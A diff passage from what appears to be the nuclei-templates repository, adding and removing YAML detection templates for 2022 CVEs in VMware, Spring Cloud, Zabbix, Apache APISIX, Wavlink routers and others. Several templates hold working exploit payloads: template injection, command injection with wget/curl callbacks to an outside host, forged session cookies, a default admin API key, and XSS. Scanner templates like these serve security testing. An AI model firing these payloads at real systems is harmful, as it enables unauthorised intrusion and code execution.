_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'function onInit()' + - 'phpinfo()' + - 'Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`.' + condition: and + + # if exploit executes, phpinfo() should now be exposed at the /{{randstr}} endpoint, even though Safe mode is enabled + + - type: status + status: + - 200 + + extractors: + - type: xpath + name: session_key + internal: true + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + attribute: value + + # Obtain _session_key for current OctoberCMS session + + - type: xpath + name: token + internal: true + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + attribute: value + + # Obtain _token for current OctoberCMS session + + - type: regex + name: theme + group: 1 + regex: + - '' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "Contact Form 7" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a004630440220135e8e57aec52c36062249a9f60be0fd5bb87f786de39d6a8fbfe9a3c76dc61402205d74f1cbbc26e6b54ae5d6133836104c105071da796608ae749dddbe1863f8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22954.yaml b/nuclei-templates/CVE-2022/cve-2022-22954.yaml deleted file mode 100644 index 02d131fa6e..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-22954.yaml +++ /dev/null @@ -1,48 +0,0 @@ -id: CVE-2022-22954 - -info: - name: VMware Workspace ONE Access - Server-Side Template Injection - author: sherlocksecurity - severity: critical - description: | - VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. - impact: | - Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. - remediation: | - Apply the latest security patches provided by VMware to mitigate this vulnerability. - reference: - - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011 - - https://www.vmware.com/security/advisories/VMSA-2022-0011.html - - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22954 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22954 - cwe-id: CWE-94 - epss-score: 0.97348 - epss-percentile: 0.99878 - cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: identity_manager - shodan-query: http.favicon.hash:-1250474341 - tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti - -http: - - method: GET - path: - - "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Authorization context is not valid" - - - type: status - status: - - 400 -# digest: 4a0a00473045022100d526962a39ddb96c782fb1b73127f860969e804b9df4fb0e992d34f58b0f8a970220594f3e21afff5d99b6ea0023e8d7fd5b96f238f8b48d7c5de5b4269733b91906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22963.yaml b/nuclei-templates/CVE-2022/cve-2022-22963.yaml deleted file mode 100644 index d04177443d..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-22963.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-22963 - -info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser - severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce - -requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 - -# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml deleted file mode 100644 index 2ceac3d1c7..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-22972.yaml +++ /dev/null @@ -1,113 +0,0 @@ -id: CVE-2022-22972 - -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - impact: | - Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. - remediation: | - Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - epss-score: 0.7146 - epss-percentile: 0.9778 - cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* - metadata: - max-request: 3 - vendor: vmware - product: identity_manager - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve2022,cve,vmware,auth-bypass,oast - -http: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - - host-redirects: true - max-redirects: 3 - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - - type: word - part: interactsh_protocol - words: - - "http" - - - type: status - status: - - 302 - - extractors: - - type: regex - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - part: body - - - type: regex - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - part: body - - - type: regex - name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - part: body - - - type: regex - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - part: body - - - type: regex - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - part: body - - - type: kval - name: HZN-Cookie - kval: - - 'HZN' - part: header -# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23131.yaml b/nuclei-templates/CVE-2022/cve-2022-23131.yaml new file mode 100644 index 0000000000..552d606dda --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-23131.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-23131 + +info: + name: Zabbix - SAML SSO Authentication Bypass + author: For3stCo1d,spac3wh1te + severity: critical + description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix monitoring system. + remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. + reference: + - https://support.zabbix.com/browse/ZBX-20350 + - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage + - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 + - https://github.com/1mxml/CVE-2022-23131 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-23131 + cwe-id: CWE-290 + epss-score: 0.96952 + epss-percentile: 0.9967 + cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: zabbix + product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: app="ZABBIX-监控系统" && body="saml" + tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev + +http: + - method: GET + path: + - "{{BaseURL}}/zabbix/index_sso.php" + - "{{BaseURL}}/index_sso.php" + + stop-at-first-match: true + + headers: + Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "contains(tolower(header), 'location: zabbix.php?action=dashboard.view')" + + - type: status + status: + - 302 +# digest: 490a0046304402205a1b293df8b7aed723300bcf514a562944a5b7526bc1d6567e5629fb5dcdeb4102201e42210613038aa5ab1f2efe25c521bab18fa8617d682b250c5261c0630a53d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml deleted file mode 100644 index 6465ac9df7..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23134.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: CVE-2022-23134 - -info: - name: Zabbix Setup Configuration Authentication Bypass - author: bananabr - severity: medium - description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration. - remediation: | - Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability. - reference: - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 - - https://support.zabbix.com/browse/ZBX-20384 - - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/ - - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N - cvss-score: 5.3 - cve-id: CVE-2022-23134 - cwe-id: CWE-287,CWE-284 - epss-score: 0.34559 - epss-percentile: 0.9671 - cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: zabbix - product: zabbix - tags: cve,cve2022,zabbix,auth-bypass,kev - -http: - - method: GET - path: - - "{{BaseURL}}/zabbix/setup.php" - - "{{BaseURL}}/setup.php" - - stop-at-first-match: true - - headers: - Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D" - - matchers-condition: and - matchers: - - type: word - words: - - "Database" - - "host" - - "port" - - "Zabbix" - condition: and - - - type: word - words: - - "youtube_main" - - "support.google.com" - part: header - condition: and - negative: true - - - type: status - status: - - 200 -# digest: 4b0a00483046022100e3fc17a46e63c043d37b84890ff55c7d3cf5f647c2885dc0484de21ac8fa5e260221008dda794693c6d89940aba0647527871cf1b59f9a8ac10fbeacf5f725abb667a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23808.yaml b/nuclei-templates/CVE-2022/cve-2022-23808.yaml deleted file mode 100644 index 4d9d63a2b9..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-23808.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2022-23808 - -info: - name: phpMyAdmin < 5.1.2 - Cross-Site Scripting - author: cckuailong,daffainfo - severity: medium - description: An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. - remediation: | - Upgrade phpMyAdmin to version 5.1.2 or later to mitigate this vulnerability. - reference: - - https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A - - https://github.com/dipakpanchal456/CVE-2022-23808 - - https://nvd.nist.gov/vuln/detail/CVE-2022-23808 - - https://www.phpmyadmin.net/security/PMASA-2022-2/ - - https://infosecwriteups.com/exploit-cve-2022-23808-85041c6e5b97 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-23808 - cwe-id: CWE-79 - epss-score: 0.00743 - epss-percentile: 0.78912 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: phpmyadmin - product: phpmyadmin - shodan-query: http.component:"phpmyadmin" - tags: cve,cve2022,phpmyadmin,xss - -http: - - method: GET - path: - - "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "\">" - - "

    Add a new server

    " - - "phpMyAdmin setup" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 -# digest: 4a0a00473045022038d5ba39a2b759095a3f8426c738ce15cf6c83b54e32b080e617ac13d733503a022100e570ecb30aa4d1b1fe02f8867294888554e1bb76b68135ab78cb7e93cf859e4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24112.yaml b/nuclei-templates/CVE-2022/cve-2022-24112.yaml new file mode 100644 index 0000000000..d023a06b4a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24112.yaml @@ -0,0 +1,86 @@ +id: CVE-2022-24112 + +info: + name: Apache APISIX - Remote Code Execution + author: Mr-xn + severity: critical + description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Upgrade to 2.10.4 or 2.12.1. Or, explicitly configure the enabled plugins in `conf/config.yaml` and ensure `batch-requests` is disabled. (Or just comment out `batch-requests` in `conf/config-default.yaml`). + reference: + - https://www.openwall.com/lists/oss-security/2022/02/11/3 + - https://twitter.com/sirifu4k1/status/1496043663704858625 + - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests + - https://nvd.nist.gov/vuln/detail/CVE-2022-24112 + - http://www.openwall.com/lists/oss-security/2022/02/11/3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-24112 + cwe-id: CWE-290 + epss-score: 0.97261 + epss-percentile: 0.99825 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: apisix + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive + +http: + - raw: + - | + POST /apisix/batch-requests HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + { + "headers":{ + "X-Real-IP":"127.0.0.1", + "Content-Type":"application/json" + }, + "timeout":1500, + "pipeline":[ + { + "method":"PUT", + "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\"}" + } + ] + } + - | + GET /api/{{randstr}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept-Language: zh-CN,zh;q=0.9 + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '"reason":"OK"' + - '"status":200' + condition: and + + - type: word + part: interactsh_protocol + words: + - http + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - GET \/([a-z-]+) HTTP + part: interactsh_request +# digest: 4b0a004830460221008ec50579ecb1d58ca336d07a17961f227be3a77e752f3700fee6696537ecfaa7022100bbacb0066289e35e4ed902e5b09dfe5935e1cf61edc477f729c80d7926a6117a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24181.yaml b/nuclei-templates/CVE-2022/cve-2022-24181.yaml new file mode 100644 index 0000000000..b3b7ce9f12 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24181.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-24181 + +info: + name: PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting + author: lucasljm2001,ekrause + severity: medium + description: | + PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade to a patched version of PKP Open Journal Systems (OJS) or apply the necessary security patches provided by the vendor. + reference: + - https://www.exploit-db.com/exploits/50881 + - https://github.com/pkp/pkp-lib/issues/7649 + - https://youtu.be/v8-9evO2oVg + - https://nvd.nist.gov/vuln/detail/cve-2022-24181 + - https://github.com/comrade99/CVE-2022-24181 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24181 + cwe-id: CWE-79 + epss-score: 0.0017 + epss-percentile: 0.53018 + cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: public_knowledge_project + product: open_journal_systems + tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project + +http: + - raw: + - | + GET /iupjournals/index.php/esj HTTP/2 + Host: {{Hostname}} + X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<script>alert(document.domain)</script><x=".com/iupjournals' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 490a004630440220721e675de3dfc8d686deef9d08aa4b511d181ddc1b2d2414d399c6fc0b7984c90220107c7012882d3600ad1a48e96140bd2a811ddc33de21a89217727ff2dab20346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24681.yaml b/nuclei-templates/CVE-2022/cve-2022-24681.yaml new file mode 100644 index 0000000000..1cd1c7e9e0 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24681.yaml @@ -0,0 +1,62 @@ +id: CVE-2022-24681 + +info: + name: ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting + author: Open-Sec + severity: medium + description: | + ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information. + remediation: | + Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. + reference: + - https://raxis.com/blog/cve-2022-24681 + - https://www.manageengine.com/products/self-service-password/advisory/CVE-2022-24681.html + - https://manageengine.com + - https://nvd.nist.gov/vuln/detail/CVE-2022-24681 + - https://www.manageengine.com/products/self-service-password/kb/CVE-2022-24681.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-24681 + cwe-id: CWE-79 + epss-score: 0.00155 + epss-percentile: 0.51848 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + tags: cve,cve2022,manageengine,xss,authenticated,zohocorp + +http: + - raw: + - | + POST /servlet/GetProductVersion HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(buildnumber, '< 6121') + + - type: word + part: body + words: + - "ManageEngine" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: buildnumber + group: 1 + regex: + - '"BUILD_NUMBER":"([0-9]+)",' + internal: true + part: body +# digest: 4a0a00473045022100bb98caa57ec6e3ed65dcc5cfbfe03e4b587538e5e968b2097fac7c24343595bf022024df61662ad6dcdb68cd5e6cc916990b9854a8d8e027ac7f1651aee87880932c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-2486.yaml b/nuclei-templates/CVE-2022/cve-2022-2486.yaml deleted file mode 100644 index 3d4861baab..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-2486.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2022-2486 - -info: - name: Wavlink WN535K2/WN535K3 - OS Command Injection - author: For3stCo1d - severity: critical - description: | - Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. - impact: | - Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. - remediation: | - Apply the latest firmware update provided by the vendor to mitigate this vulnerability. - reference: - - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486 - - https://vuldb.com/?id.204537 - - https://nvd.nist.gov/vuln/detail/CVE-2022-2486 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-2486 - cwe-id: CWE-78 - epss-score: 0.97331 - epss-percentile: 0.99879 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wavlink - product: wl-wn535k2_firmware - shodan-query: http.title:"Wi-Fi APP Login" - tags: cve2022,cve,iot,wavlink,router,rce,oast - -http: - - raw: - - | - GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: status - status: - - 500 -# digest: 4b0a00483046022100b34c9aac4b9a1b672c0d52fd667187a1d74768987e33b4d41b8b694a9f5802f5022100ed27bf9f661bb4e7471c509027150bf34f2905d0b15ff35d6fcd1b08022ad4ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-2487.yaml b/nuclei-templates/CVE-2022/cve-2022-2487.yaml new file mode 100644 index 0000000000..10b7510a7e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-2487.yaml @@ -0,0 +1,63 @@ +id: CVE-2022-2487 + +info: + name: Wavlink WN535K2/WN535K3 - OS Command Injection + author: For3stCo1d + severity: critical + description: | + Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. + remediation: | + Apply the latest firmware update provided by the vendor to mitigate this vulnerability. + reference: + - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20nightled.cgi%20.md + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2487 + - https://vuldb.com/?id.204538 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2487 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-2487 + cwe-id: CWE-78 + epss-score: 0.97404 + epss-percentile: 0.99916 + cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wavlink + product: wl-wn535k2_firmware + shodan-query: http.title:"Wi-Fi APP Login" + tags: cve,cve2022,iot,wavlink,router,rce,oast +variables: + cmd: "id" + +http: + - raw: + - | + @timeout: 10s + POST /cgi-bin/nightled.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=night_led&start_hour=;{{cmd}}; + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "uid=" + - "gid=" + - "nightStart" + condition: and + + - type: word + words: + - text/html + + - type: status + status: + - 200 +# digest: 480a00453043022063c0e55419c9314aa4179cbc620cda3fb24c5a8ec5f8a5bf570b4744cf6fd2d4021f5a44d8882c4a8b74f1f1a6a3d2651b10ecd553f39eb188a71f5c135ab2cde4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-24899.yaml b/nuclei-templates/CVE-2022/cve-2022-24899.yaml new file mode 100644 index 0000000000..ec78a7b42d --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-24899.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-24899 + +info: + name: Contao <4.13.3 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in 